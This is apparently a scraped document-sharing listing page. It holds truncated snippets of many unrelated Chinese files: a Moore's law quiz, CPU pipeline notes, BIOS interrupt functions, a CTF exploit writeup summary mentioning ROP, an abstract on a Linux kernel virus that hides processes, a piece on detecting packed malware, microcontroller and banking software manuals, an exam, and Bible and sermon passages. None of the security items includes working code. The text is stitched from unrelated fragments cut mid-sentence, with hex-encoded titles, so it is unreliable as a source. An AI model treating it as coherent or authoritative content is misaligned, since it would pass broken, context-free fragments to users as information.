<4D F736F F D D342DA57CA7DEA447B14D2DA475B57BBB50BADEB27AC3FEB14DA447B8D5C344> 1. 請 問 誰 提 出 積 體 電 路 (IC) 上 可 容 納 的 電 晶 體 數 目, 約 每 隔 24 個 月 (1975 年 更 改 為 18 個 月 ) 便 會 增 加 一 倍, 效 能 也 將 提 升 一 倍, 也 揭 示 了 資 訊 科 技 進 步 的 速 度? (A) 英 特 爾 (Intel) 公 司 創 始 人 戈 登. 摩 爾 (Gordon Moore) (B) 微 軟 (Microsoft)

More information

untitled

untitled CPU!! 00-11-8 Liping zhang, Tsinghua 1 : ADD(r1, r, r) CMPLEC(r, 5, r0) MUL(r1, r, r) SUB(r1, r, r5) ADD r, ( ) r CMP. CMP r.. t t + 1 t + t + t + t + 5 t + 6 IF( ) ADD CMP MUL SUB RF NOP ADD CMP MUL SUB

More information

(2) Function 0BH: Function 0CH: (pixel, picture element) Function 0DH: Function 0FH: Function 13H:

(2) Function 0BH: Function 0CH: (pixel, picture element) Function 0DH: Function 0FH: Function 13H: (1) INT 10H Function 00H: Function 01H: Function 02H: Function 03H: Function 05H: Function 06H: Function 07H: Function 08H: Function 09H: Function 0AH: (2) Function 0BH: Function 0CH: (pixel, picture element)

More information

Untitled

Untitled Exploit 3000 writeup 0x00 概述 个 人感觉这道题主要难在逆向, 各种函数还是 比较复杂的, 而且还有 一个找到尽可能多的漏洞的提 示, 让我分析的时候感觉很难受, 生怕错过了 一些漏洞 而导致拿不到分 ( 虽然到最后也没找到什么漏洞啊 T T) 挖到漏洞之后 exploitme.dll 里 面提 示的很明显了, 就是逼着你 用 ROP, 你需要什么都给你, 最后给我把 exp

More information

A Preliminary Implementation of Linux Kernel Virus and Process Hiding

A Preliminary Implementation of Linux Kernel Virus and Process Hiding 邵 俊 儒 翁 健 吉 妍 年 月 日 学 号 学 号 学 号 摘 要 结 合 课 堂 知 识 我 们 设 计 了 一 个 内 核 病 毒 该 病 毒 同 时 具 有 木 马 的 自 动 性 的 隐 蔽 性 和 蠕 虫 的 感 染 能 力 该 病 毒 获 得 权 限 后 会 自 动 将 自 身 加 入 内 核 模 块 中 劫 持 的 系 统 调 用 并 通 过 简 单 的 方 法 实 现 自 身 的

More information

<4D6963726F736F667420576F7264202D20C8EDBCFEB9A4B3CCCFEEC4BFD0E8C7F3B5F7D1D0B1A8B8E6B7B6B1BE>

<4D6963726F736F667420576F7264202D20C8EDBCFEB9A4B3CCCFEEC4BFD0E8C7F3B5F7D1D0B1A8B8E6B7B6B1BE> 机 遇 创 造 发 展 科 技 造 就 成 功 软 件 工 程 项 目 需 求 调 研 报 告 ( 范 本 ) ( 调 研 时 间 :0000-00-00 至 0000-00-00) 深 圳 市 易 讯 诚 信 息 技 术 有 限 公 司 调 研 报 告 简 要 说 明 XXX 公 司 软 件 工 程 项 目 需 求 调 研 报 告 是 根 据 XXX 公 司 现 有 管 理 体 系 整 理 而 成,

More information

未命名-1

未命名-1 rogrammer rogrammer CONTENTS 8 9 10 14 32 16 17 34 18 20 22 23 24 Blog http://mag.csdn.net 010-84540161 25 26 36 39 41 2 rogrammer CONTENTS 42 47 51 55 58 64 78 79 68 70 80 83 76 85 4 rogrammer CONTENTS

More information

ebook45-5

ebook45-5 5 S Q L SQL Server 5.1 5-1 SQL Server 5-1 A B S A C O S A S I N ATA N AT N 2 C E I L I N G C O S C O T D E G R E E S E X P F L O O R L O G L O G 10 P I P O W E R R A D I A N S R A N D R O U N D S I G N

More information

<4D6963726F736F667420576F7264202D20A578A55FB449A8B9BBC8A6E6C17EB8EAC2E0B162A874B2CE56362E365F313031303420BEDE2E646F63>

<4D6963726F736F667420576F7264202D20A578A55FB449A8B9BBC8A6E6C17EB8EAC2E0B162A874B2CE56362E365F313031303420BEDE2E646F63> 代 收 薪 資 轉 帳 系 統 (VER 6.6) 操 作 手 冊 中 華 民 國 101 年 04 月 目 前 言... 2 0-0 代 收 薪 資 轉 存 系 統 說 明... 2 0-1-1 如 何 下 載 代 收 薪 資 轉 帳 系 統... 4 0-1-2 如 何 安 裝 代 收 薪 資 轉 帳 系 統... 10 0-1-3 如 何 更 新 代 收 薪 資 轉 帳 系 統... 13 0-1-4

More information

Chn 116 Neh.d.01.nis

Chn 116 Neh.d.01.nis 31 尼 希 米 书 尼 希 米 的 祷 告 以 下 是 哈 迦 利 亚 的 儿 子 尼 希 米 所 1 说 的 话 亚 达 薛 西 王 朝 二 十 年 基 斯 流 月 *, 我 住 在 京 城 书 珊 城 里 2 我 的 兄 弟 哈 拿 尼 和 其 他 一 些 人 从 犹 大 来 到 书 珊 城 我 向 他 们 打 听 那 些 劫 后 幸 存 的 犹 太 人 家 族 和 耶 路 撒 冷 的 情 形

More information

untitled

untitled 禮 降 1 3 5 龍 7 力 8 練 9 力 女 10 11 92 路 行 13 玲 15 92 林 歷 17 女 旅 19 93 鈴 21 93 礪 勵 林 數 23 李 25 數 26 倫 27 28 劉 數 31 33 35 理 38 84 金 40 理 42 86 44 87 靈 林 47 力 類 49 89 樂 51 90 路 李 53 不 55 57 91 59 61 63 65 錄

More information

软件测试(TA07)第一学期考试

软件测试(TA07)第一学期考试 一 判 断 题 ( 每 题 1 分, 正 确 的, 错 误 的,20 道 ) 1. 软 件 测 试 按 照 测 试 过 程 分 类 为 黑 盒 白 盒 测 试 ( ) 2. 在 设 计 测 试 用 例 时, 应 包 括 合 理 的 输 入 条 件 和 不 合 理 的 输 入 条 件 ( ) 3. 集 成 测 试 计 划 在 需 求 分 析 阶 段 末 提 交 ( ) 4. 单 元 测 试 属 于 动

More information

<4D F736F F D20CEC4BCFEBCB6B6F1D2E2B4FAC2EBC9A8C3E8D2FDC7E6D6D0B5C4BCD3BFC7CAB6B1F0BCBCCAF52E646F6378>

<4D F736F F D20CEC4BCFEBCB6B6F1D2E2B4FAC2EBC9A8C3E8D2FDC7E6D6D0B5C4BCD3BFC7CAB6B1F0BCBCCAF52E646F6378> 文件级恶意代码扫描引擎中的加壳识别技术 安天实验室 Swordlea 2003 年 12 月 25 日 在文件级恶意代码扫描引擎的设计与实现过程中, 加壳后样本的特征选取和识别是较为棘手的问题 恶意代码的制作者为了使其作品传播更广, 往往使用软件加壳的方式 样本被加壳以后, 其原有特征码被变形或彻底隐藏, 在一定程度中增加了样本分析与识别的难度 目前反病毒公司在对加壳后样本的处理上一般采用以下几种方式

More information

1 Project New Project 1 2 Windows 1 3 N C test Windows uv2 KEIL uvision2 1 2 New Project Ateml AT89C AT89C51 3 KEIL Demo C C File

1 Project New Project 1 2 Windows 1 3 N C test Windows uv2 KEIL uvision2 1 2 New Project Ateml AT89C AT89C51 3 KEIL Demo C C File 51 C 51 51 C C C C C C * 2003-3-30 pnzwzw@163.com C C C C KEIL uvision2 MCS51 PLM C VC++ 51 KEIL51 KEIL51 KEIL51 KEIL 2K DEMO C KEIL KEIL51 P 1 1 1 1-1 - 1 Project New Project 1 2 Windows 1 3 N C test

More information

Magic Desktop

Magic Desktop 基 础 指 南 本 手 册 介 绍 如 何 使 用 Magic Desktop 概 述... 2 外 观... 3 操 作... 4 规 格... 19 PFU LIMITED 2013 Magic Desktop Magic Desktop 是让您在移动设备和云时代中管理信息的软件应用程序 以下数据可分入不同工作 群组或个人群组中 通过 ScanSnap (*1) 扫描的数据 在 ipad/iphone/ipod

More information

AVR单片机指令系统.PDF

AVR单片机指令系统.PDF AVR 4 1 (1) 89 :AT90S1200, ; (2) 90 ( ):Attiny11/12/15/22; 90 = +89 (3) 118 ( ):AT90S2313/2323/2343/2333,/4414/4433/4434/8515/90S8534/8535 ;118 = + 90 ; (4) 121 ( )ATmega603/103; 121 = + 118 ; (5) 130

More information

Data Management Software CL-S10w

Data Management Software CL-S10w Data Management Software CL-S10w Windows Windows XP Microsoft Windows XP Professional Operating System Windows Windows 7 Microsoft Windows 7 Professional Operating System Windows Windows 8 Microsoft Windows

More information

1-1 SH79F6431 A. 2( ) 9~15V ( 12V) U2 U3 3.3V SH79F B. 1(VCC/GND) SH79F6431 C. VDDIO SH79F6431 P4 P5 P0.6 P0.7 VDDIO VDDIO=5V D. 2 V 1.0

1-1 SH79F6431 A. 2( ) 9~15V ( 12V) U2 U3 3.3V SH79F B. 1(VCC/GND) SH79F6431 C. VDDIO SH79F6431 P4 P5 P0.6 P0.7 VDDIO VDDIO=5V D. 2 V 1.0 SH79F6431 1. SH79F6431 1T 8051 FLASH SH79F JET51 Keil µ vision JTAG 1.1. SH79F6431 LQFP64 1.2. (Target Board) SH79F6431 1 V 1.0 1-1 SH79F6431 A. 2( ) 9~15V ( 12V) U2 U3 3.3V SH79F6431 1 2 1 B. 1(VCC/GND)

More information

IP TCP/IP PC OS µclinux MPEG4 Blackfin DSP MPEG4 IP UDP Winsock I/O DirectShow Filter DirectShow MPEG4 µclinux TCP/IP IP COM, DirectShow I

IP TCP/IP PC OS µclinux MPEG4 Blackfin DSP MPEG4 IP UDP Winsock I/O DirectShow Filter DirectShow MPEG4 µclinux TCP/IP IP COM, DirectShow I 2004 5 IP TCP/IP PC OS µclinux MPEG4 Blackfin DSP MPEG4 IP UDP Winsock I/O DirectShow Filter DirectShow MPEG4 µclinux TCP/IP IP COM, DirectShow I Abstract The techniques of digital video processing, transferring

More information

候, 妳 看 準 他 睡 的 地 方, 就 進 去 掀 開 他 腳 上 的 被, 躺 臥 在 那 裡, 他 必 告 訴 妳 所 當 做 的 事 路 得 說 : 凡 妳 所 吩 咐 的, 我 必 遵 行 路 得 就 下 到 場 上, 照 她 婆 婆 所 吩 咐 她 的 而 行 波 阿 斯 吃 喝 完

候, 妳 看 準 他 睡 的 地 方, 就 進 去 掀 開 他 腳 上 的 被, 躺 臥 在 那 裡, 他 必 告 訴 妳 所 當 做 的 事 路 得 說 : 凡 妳 所 吩 咐 的, 我 必 遵 行 路 得 就 下 到 場 上, 照 她 婆 婆 所 吩 咐 她 的 而 行 波 阿 斯 吃 喝 完 Series: 爱 的 故 事 : 上 帝 的 救 赎 史 诗 Title: 第 三 讲 : 爱 的 冒 险 Part: Speaker: 大 卫 普 莱 特 博 士 Date: 07/9/2009 Text: 爱 的 冒 险 路 得 记 第 三 章 各 位 弟 兄 姊 妹 们 平 安, 欢 迎 收 听 爱 的 故 事 : 上 帝 的 救 赎 史 诗 系 列 第 三 讲, 我 是 大 卫 普 莱 特

More information

我 们 再 看 到 尼 西 米 记, 也 会 发 现 当 时 神 的 百 姓 有 一 颗 单 纯 受 教 的 心, 他 们 单 纯 的 听 从 神 的 教 导, 敬 畏 遵 从 神 的 训 诲 当 他 们 明 白 自 己 的 罪 孽 时, 个 个 俯 伏 在 地, 为 罪 痛 悔 哭 泣 在 整 个

我 们 再 看 到 尼 西 米 记, 也 会 发 现 当 时 神 的 百 姓 有 一 颗 单 纯 受 教 的 心, 他 们 单 纯 的 听 从 神 的 教 导, 敬 畏 遵 从 神 的 训 诲 当 他 们 明 白 自 己 的 罪 孽 时, 个 个 俯 伏 在 地, 为 罪 痛 悔 哭 泣 在 整 个 Series: 救 赎 历 史 Title: 第 三 十 章 : 认 罪 悔 改 归 向 神 Part: 4 Speaker: 大 卫 普 莱 特 博 士 Date: 08/15/2010 Text: 各 位 弟 兄 姊 妹 平 安, 欢 迎 你 收 听 救 赎 历 史 系 列 第 四 部 份, 我 是 大 卫 普 莱 特 博 士 今 天, 我 们 要 进 入 第 三 十 章, 让 我 们 以 戒

More information